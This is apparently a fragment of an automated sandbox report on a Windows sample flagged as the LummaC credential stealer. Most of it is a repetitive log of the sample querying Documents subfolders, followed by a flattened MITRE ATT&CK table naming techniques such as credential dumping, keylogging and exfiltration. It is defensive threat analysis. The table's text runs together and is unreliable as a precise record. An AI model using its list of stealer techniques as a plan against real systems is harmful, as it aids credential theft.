    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: number of queries: 1001

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting    		Valid Accounts121
    Windows Management Instrumentation    		1
    Scripting    		12
    Process Injection    		11
    Masquerading    		2
    OS Credential Dumping    		231
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		22
    Virtualization/Sandbox Evasion    		LSASS Memory22
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol31
    Data from Local System    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
    Process Injection    		Security Account Manager3
    Process Discovery    		SMB/Windows Admin Shares1
    Clipboard Data    		3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading    		NTDS22
    File and Directory Discovery    		Distributed Component Object ModelInput Capture14
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets24
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.